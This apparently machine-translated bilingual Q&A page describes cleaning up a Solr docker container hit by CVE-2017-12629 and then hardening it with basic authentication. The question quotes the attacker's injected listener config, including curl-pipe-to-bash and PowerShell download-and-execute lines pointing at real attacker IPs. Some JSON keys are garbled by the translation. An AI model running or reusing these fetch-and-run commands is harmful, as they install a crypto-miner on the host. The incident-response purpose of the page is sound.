问题描述

史前:

1. 我朋友的网站开始运行缓慢.
2. 本网站使用docker.
3. htop 告诉我，所有内核都由用户 8983 的进程 /var/tmp/sustes 100% 加载.试图找出什么是 sustes，但 Google 没有帮助，但是 8983 告诉 Solr 容器中的问题.

4. 尝试从 v6 更新 Solr.?到 7.4 并收到消息:

1. My friend's site started to work slowly.
2. This site uses docker.
3. htop told me that all cores loaded on 100% by the process /var/tmp/sustes with the user 8983. Tried to find out what is sustes, but Google did not help, but 8983 tells that the problem in Solr container.

4. Tried to update Solr from v6.? to 7.4 and got the message:

o.a.s.c.SolrCore 关闭时出错...引起:org.apache.solr.common.SolrException:加载类时出错'solr.RunExecutableListener'

回滚到 v6.6.4(作为 docker-hub 上唯一可用的 v6 https://hub.docker.com/_/solr/)，因为站点应该继续工作.

Rolled back to v6.6.4 (as the only available v6 on docker-hub https://hub.docker.com/_/solr/) as site should continue working.

在 Docker 的日志中我发现:

In Dockers logs I found:

[x:default] o.a.s.c.S.SolrConfigHandler 成功执行配置命令并持久化到文件系统 [{"update-listener":{"exe":"sh","name":"newlistener-02",参数":[-C"，"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],"事件":"newSearcher","class":"solr.RunExecutableListener","dir":"/bin/"}}]

所以在 http://192.99.142.226:8220/mr.sh 我们可以找到安装加密矿工的恶意软件代码(加密矿工配置:http://192.99.142.226:8220/wt.conf).

So at http://192.99.142.226:8220/mr.sh we can find the malware code which installs crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).

使用链接http://example.com:8983/solr/YOUR_CORE_NAME/config 我们可以找到完整的配置，但现在我们只需要 listener 部分:

Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can find full config, but right now we need just listener section:

"监听器":[{"事件":"newSearcher","class":"solr.QuerySenderListener","查询":[]},{"事件":"firstSearcher","class":"solr.QuerySenderListener","查询":[]},{"exe":"sh","name":"newlistener-02",参数":[-c"，"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],"事件":"newSearcher","class":"solr.RunExecutableListener","dir":"/bin/"},{"exe":"sh","name":"newlistener-25",参数":[-c"，"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],"事件":"newSearcher","class":"solr.RunExecutableListener","dir":"/bin/"},{"exe":"cmd.exe","name":"newlistener-00",参数":[/c"，"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],"事件":"newSearcher","class":"solr.RunExecutableListener","dir":"cmd.exe"}],

由于我们在 solrconfig.xml 中没有这样的设置，我在 /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json 中找到了它们(该文件的设置可以在 http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay

As we do not have such settings at solrconfig.xml, I found them at /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be found at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay

推荐答案

修复:

1. 清理 configoverlay.json，或者直接删除这个文件 (rm/opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).

1. Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).

重启 Solr(如何启动\停止 - https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) 或重启 docker 容器.

Restart Solr (how to Start\Stop - https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart docker container.

据我所知，这种攻击可能是由于 CVE-2017-12629:

1. 如何使用 CVE-2017-12629 攻击 Apache Solr - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/

CVE-2017-12629:从 Solr 中删除 RunExecutableListener - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc

CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc

... 并且正在 v5.5.5、6.6.2+、7.1+ 中修复

... and is being fixed in v5.5.5, 6.6.2+, 7.1+

这是由于任何人都可以免费获得http://example.com:8983，所以尽管有这个漏洞已修复，让我们...

which is due to freely available http://example.com:8983 for anyone, so despite this exploit is fixed, lets...

1. 为 http://example.com:8983

基于 https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin

创建security.json:

{验证":{blockUnknown":真，"class":"solr.BasicAuthPlugin","凭据":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}},授权":{"class":"solr.RuleBasedAuthorizationPlugin",权限":[{名称":安全编辑"，"角色":"管理员"}],"用户角色":{"solr":"admin"}}}

这个文件必须放在 /opt/solr/server/solr/(即在 solr.xml 旁边)

This file must be dropped at /opt/solr/server/solr/ (ie next to solr.xml)

由于 Solr 有自己的哈希检查器(作为 sha256(password+salt) 哈希)，这里不能使用典型的解决方案.我发现生成哈希的最简单方法是从这里下载 jar 文件 http://www.planetcobalt.net/sdb/solr_password_hash.shtml(在文章末尾)并作为 java -jar SolrPasswordHash.jar NewPassword 运行它.

As Solr has its own Hash-checker (as a sha256(password+salt) hash), a typical solution can not be used here. The easiest way to generate hash that Ive found is to download jar file from here http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.

因为我使用docker-compose，所以我只是像这样构建Solr:

Because I use docker-compose, I simply build Solr like this:

# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/

# project/sources/docker-compose.yml (just Solr part)
solr:
  build: ./dockerfiles/solr/
  container_name: solr-container

  # Check if 'default' core is created. If not, then create it.
  entrypoint:
    - docker-entrypoint.sh
    - solr-precreate
    - default

  # Access to web interface from host to container, i.e 127.0.0.1:8983
  ports:
    - "8983:8983"
  volumes:
  - ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default  # configs
  - ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data  # indexes

这篇关于SolrException:加载类“solr.RunExecutableListener"+“/var/tmp/sustes"进程时出错的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持！